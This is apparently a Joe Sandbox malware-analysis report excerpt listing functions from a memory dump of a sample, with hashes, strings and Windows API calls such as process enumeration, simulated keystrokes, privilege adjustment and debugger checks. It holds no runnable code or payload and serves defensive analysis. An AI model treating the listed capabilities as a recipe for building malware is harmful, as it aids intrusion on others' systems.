Instruction ID: 5ead8a4bac6689b8c34dc735239a24fb67b91c980ffde9ad8c165dd2f8cd03d8
Opcode Fuzzy Hash: 92521e4d2c5ce21d4cee4699b5609330ba17b3bc0fdbcd0cb240b519a0447a8f
Instruction Fuzzy Hash: CC51C471A00204AFDB10EF64C886F7AB7E5AB84718F04C058FA099F3C3D771AD428BA1

Uniqueness

Uniqueness Score: -1.00%

Function 009F8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009F83FA
ERCP, xrefs: 009F813C
VUUU, xrefs: 00A35DF0
VUUU, xrefs: 009F83E8
VUUU, xrefs: 009F843C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 73317bb7ed8eee6c50eb4e0aa008168c16debebfcc398c6aea55d7d50da59807
Instruction ID: 133e2e2d18f3f178d3d0fc8f44984138a740b59ed12135c6fdb367e9443f59b6
Opcode Fuzzy Hash: 73317bb7ed8eee6c50eb4e0aa008168c16debebfcc398c6aea55d7d50da59807
Instruction Fuzzy Hash: 49A27A71E0061ACBDF64CF68C8447BEB7B1BB54314F2485AAE915AB284EB749D81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A7A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00A7A6BA

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Process32NextW.KERNEL32(00000000,?), ref: 00A7A79C
CloseHandle.KERNEL32(00000000), ref: 00A7A7AB

Part of subcall function 00A0CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A33303,?), ref: 00A0CE8A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 51a384cc9a3785482301aa2abd2841cf128f180e89127d5af0f7fd9870d5cfad
Instruction ID: 2af095fd5995a0348dbd673bf12fd0b3eb2b263991e9c92d54ac3b9c410d372e
Opcode Fuzzy Hash: 51a384cc9a3785482301aa2abd2841cf128f180e89127d5af0f7fd9870d5cfad
Instruction Fuzzy Hash: C9514CB1508304AFD710EF24D986A6BBBE8FFC9754F00891DF58997292EB70D904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A5AAAC
SetKeyboardState.USER32(00000080), ref: 00A5AAC8
PostMessageW.USER32 ref: 00A5AB36
SendInput.USER32(00000001,?,0000001C), ref: 00A5AB88

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8388464c83a30954a3aef5191aad1556b869456157a105fd20c3b916c9fbf4ff
Instruction ID: 4161acef8dfe21733a91ce1e0c0dc6227826a4c3ea39f068968e4cd88d5d3891
Opcode Fuzzy Hash: 8388464c83a30954a3aef5191aad1556b869456157a105fd20c3b916c9fbf4ff
Instruction Fuzzy Hash: A531E530B40248AEEB35CB689C05BFA7BA6BB64322F04431AF981561D1D3758D89C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A6CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00A6CE89
GetLastError.KERNEL32(?,00000000), ref: 00A6CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00A6CEFE

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 8e42b8819d854d8b0446f74132341fef01746eccf938360096b622d94fb39b3c
Instruction ID: 4655c1d279f6c4f1e6103509dcbd9279f3fbef934f3e09a479cc157fc6d6a1d3
Opcode Fuzzy Hash: 8e42b8819d854d8b0446f74132341fef01746eccf938360096b622d94fb39b3c
Instruction Fuzzy Hash: 8421AFB1600305ABDB20DFA5C948BA7B7FCEB50364F10441EE696D2151E775EE45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A58298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A582AA

Strings

|, xrefs: 00A582DA
(, xrefs: 00A582F0

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 0d217b7e22c064c1ee35fb0943c367fed78e6a7b2ab3612010f3c669c1bf6c0c
Instruction ID: 52591890a5187ba25768bf98f959171e56fd476a4e1b0136494687db1406a0c6
Opcode Fuzzy Hash: 0d217b7e22c064c1ee35fb0943c367fed78e6a7b2ab3612010f3c669c1bf6c0c
Instruction Fuzzy Hash: AF322775A00605DFCB28CF59C48196AB7F0FF48720B15C56EE89AEB7A1EB74E941CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A65C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A65CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00A65D17
FindClose.KERNEL32(?), ref: 00A65D5F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 260e85ca64a199a091e06c57de8585eb4f374fbf127a5de02c5ac5203e74a1ee
Instruction ID: 72c9f0960d0ff6829807f94617ecfb0fd6ddf174fe3aff18263df302d5d3472a
Opcode Fuzzy Hash: 260e85ca64a199a091e06c57de8585eb4f374fbf127a5de02c5ac5203e74a1ee
Instruction Fuzzy Hash: 33517774A04A01DFC714DF28C494AAAB7F4FF49324F14855EE99A8B3A2DB30E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A22622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00A2271A
SetUnhandledExceptionFilter.KERNEL32 ref: 00A22724
UnhandledExceptionFilter.KERNEL32(?), ref: 00A22731

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4da74ddcbc5fe7a5b99e7daf127eacb0eb132981f3d4bd843e60363f49586a57
Instruction ID: f1a242505be2f3087a747a0a5c8b3bd20f208f8ad60c506a3714ca0d09338cd5
Opcode Fuzzy Hash: 4da74ddcbc5fe7a5b99e7daf127eacb0eb132981f3d4bd843e60363f49586a57
Instruction Fuzzy Hash: 7831B57591122CABCB21DF68DD89BDDB7B8AF08310F5041EAE81CA7261E7709F818F55

Uniqueness

Uniqueness Score: -1.00%

Function 00A651CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A651DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A65238
SetErrorMode.KERNEL32(00000000), ref: 00A652A1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 6979d2192b3ab3becff7e7774b6d5590fd4fa82da48dbb3beca463b155159afd
Instruction ID: 81adb10dfe4346c682055a2efee55c4e054a7065dd7f4b6e026a34fdfdb2261c
Opcode Fuzzy Hash: 6979d2192b3ab3becff7e7774b6d5590fd4fa82da48dbb3beca463b155159afd
Instruction Fuzzy Hash: FE312B75A00518DFDB00DFA4D894FADBBB4FF49314F048099E905AB3A2DB31E856CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A516C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A10668
Part of subcall function 00A0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A10685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5173A
GetLastError.KERNEL32 ref: 00A5174A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 8bfc270d93dc66266c6bd9fd7566d2c8677a2461d895675ecdbdaa9c31a95b4f
Instruction ID: 4537c738623d4470c146541778eaafbec471b7e34cb3f97704770836bbe6ef81
Opcode Fuzzy Hash: 8bfc270d93dc66266c6bd9fd7566d2c8677a2461d895675ecdbdaa9c31a95b4f
Instruction Fuzzy Hash: 691104B1400308AFD718DF64EC86E6BB7B9FB44715B20842EF45653641EB70BC418F20

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A5D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00A5D645
CloseHandle.KERNEL32(?), ref: 00A5D650

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 328c432e3f228b879d0857aa0685cdeec461e62a58e5627d575777d14922a78c
Instruction ID: 40934e0e8ec6ffcc4db0c852dbd59aca6c945704e4f9ba21024f1515ff82a030
Opcode Fuzzy Hash: 328c432e3f228b879d0857aa0685cdeec461e62a58e5627d575777d14922a78c
Instruction Fuzzy Hash: 6E113C75E05228BBDB208F959C45FAFBBBCEB45B60F108115F904E7290D6704A068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A51663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A5168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A516A1
FreeSid.ADVAPI32(?), ref: 00A516B1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 5c84e6f681379d68421862752923b0e95fdf6d3ced1331dda767ac84fb7500c0
Instruction ID: 7efbad39266894a70906a04d0d50a9ef0d77f64f343f022aed2958d6b1f3e48f
Opcode Fuzzy Hash: 5c84e6f681379d68421862752923b0e95fdf6d3ced1331dda767ac84fb7500c0
Instruction Fuzzy Hash: FCF04471940308FBDB00CFE09C89EAEBBBCFB08250F104460E900E2180E330AA048B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00A2C36C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 48147284b9991c2e10f228de82031367036e7bb5f8ff1a54c6bada4bf8a02fd3
Instruction ID: 6464280697fc919e369bb5f5678f1e74cd017ee584cd68064def42cc2bd8b1c4
Opcode Fuzzy Hash: 48147284b9991c2e10f228de82031367036e7bb5f8ff1a54c6bada4bf8a02fd3
Instruction Fuzzy Hash: C5412872500229ABCB24EFBDEC49EAFB778EB84764F104679F915DB180E6709D818B50

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00A4D28C

Strings

X64, xrefs: 00A4D2A8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 8e46c39125e91e7e99f1a1762fcf2726c8dc3ac2eb163e44736e5c3b5e4e8162
Instruction ID: 5fc0ab72c132ef0529bff7a8795f25cee740d7441e1c0bbc2aefa393556b3bc8
Opcode Fuzzy Hash: 8e46c39125e91e7e99f1a1762fcf2726c8dc3ac2eb163e44736e5c3b5e4e8162
Instruction Fuzzy Hash: 80D0CAB980112DEBCB90CBE0EC88DDAB3BCBB04346F100292F10AA2140DBB096498F20

Uniqueness

Uniqueness Score: -1.00%

Function 00A1CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 4702e0f6e873af4961bf6785eb0fd02d7feea8bb9f71cb225b3f0f89e486d3f1
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 5E021C71E402199BDF14CFA9D9806EDFBF1EF48324F25816AD819EB380D731AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00A668EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A66918
FindClose.KERNEL32(00000000), ref: 00A66961

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 6f0ee7330e95f3737ead5f73423f5ff88797d6f35ea2d5dd9a71d3c2dbc8a46d
Instruction ID: 55c5f979d5ae3172c2d8ab1d22e07083dbb02445bb5efbc6019205da6c33444d
Opcode Fuzzy Hash: 6f0ee7330e95f3737ead5f73423f5ff88797d6f35ea2d5dd9a71d3c2dbc8a46d
Instruction Fuzzy Hash: 2111D0726042059FC710DF69C484A26FBE4FF84328F04C699F9698F2A2D730EC05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A637B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A74891,?,?,00000035,?), ref: 00A637E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A74891,?,?,00000035,?), ref: 00A637F4

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 0033e04ef3bfa97910bfa3bddf6d4f4fa85098dcdb088d9025f9787f7504f4cf
Instruction ID: 6ed688dee4d0deede98f6c7610694909a95818de85c4c85864416b8428d1cf5c
Opcode Fuzzy Hash: 0033e04ef3bfa97910bfa3bddf6d4f4fa85098dcdb088d9025f9787f7504f4cf
Instruction Fuzzy Hash: 73F0E5B16042282AEB20A7B69C4DFEB7AAEEFC4771F000165F509D2281D9709905CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 00A5B25D
keybd_event.USER32 ref: 00A5B270

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: d8802376609429cebf9c431cb5d144dc340e1f9a26a8191ce36f43aadd4280f9
Instruction ID: 9d03f3f8610b10f6383106e79f1f418f5a53f65295016ead926f0bc82428616c
Opcode Fuzzy Hash: d8802376609429cebf9c431cb5d144dc340e1f9a26a8191ce36f43aadd4280f9
Instruction Fuzzy Hash: E0F01D7181424DABDF05DFA0C805BEE7BB4FF04316F008009F955A5191C77986159FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A510BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A511FC), ref: 00A510D4
CloseHandle.KERNEL32(?), ref: 00A510E9

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 64fa9f5ff7042334c5a0748a99b5b73d9e4bdf1d5e49025fff3de4959ebda7aa
Instruction ID: 90c375a9c82e320315437fdc3521438a4424c0e8ce14f377479edb7632760960
Opcode Fuzzy Hash: 64fa9f5ff7042334c5a0748a99b5b73d9e4bdf1d5e49025fff3de4959ebda7aa
Instruction Fuzzy Hash: 04E04F32004600AEE7256B61FC05E7377A9FB04320B20882DF4A5804F1DB72AC91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009FCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00A40C40

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

